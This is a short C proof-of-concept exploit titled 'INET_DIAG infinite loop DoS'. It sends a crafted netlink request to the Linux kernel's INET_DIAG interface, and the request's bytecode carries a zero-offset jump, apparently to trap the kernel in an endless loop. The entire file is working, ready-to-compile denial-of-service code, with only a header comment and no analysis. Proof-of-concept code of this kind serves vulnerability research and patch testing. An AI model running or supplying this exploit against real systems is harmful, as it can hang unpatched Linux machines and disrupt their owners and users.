/*
 * INET_DIAG infinite loop DoS
 * Dan Rosenberg (@djrbliss)
 * 
 * Thanks to Nelson Elhage for sharing code
 */

#include <linux/inet_diag.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <linux/rtnetlink.h>

int main (int argc, char *argv[])
{
	int fd;
	struct msghdr msg;
	struct iovec iov;
	struct sockaddr_nl nladdr   = {.nl_family = AF_NETLINK};
	struct {
		struct nlmsghdr nlh;
		struct inet_diag_req r;
		struct rtattr a1
		  __attribute__((aligned (RTA_ALIGNTO)));
		struct inet_diag_bc_op loop
		  __attribute__((aligned (RTA_ALIGNTO)));
	} req = {
		.nlh.nlmsg_type  = TCPDIAG_GETSOCK,
		.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST,
		.r.idiag_family  = AF_INET,
		.r.idiag_states  = -1,
		.a1 = { RTA_LENGTH(sizeof req.loop), INET_DIAG_REQ_BYTECODE},
		.loop = { INET_DIAG_BC_JMP, 0, sizeof req.loop },
	};

	if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_INET_DIAG)) < 0) {
		printf("[*] Failed to open netlink socket.\n");
		return 1;
	}

	iov = (struct iovec) {
		.iov_base = &req,
		.iov_len  = sizeof req
	};

	req.nlh.nlmsg_len = sizeof req;

	msg = (struct msghdr) {
		.msg_name	= (void*)&nladdr,
		.msg_namelen 	= sizeof nladdr,
		.msg_iov	= &iov,
		.msg_iovlen	= 1
	};

	if (sendmsg(fd, &msg, 0) < 0) {
		printf("[*] Failed to send message.\n");
		return 1;
	}

	return 0;
}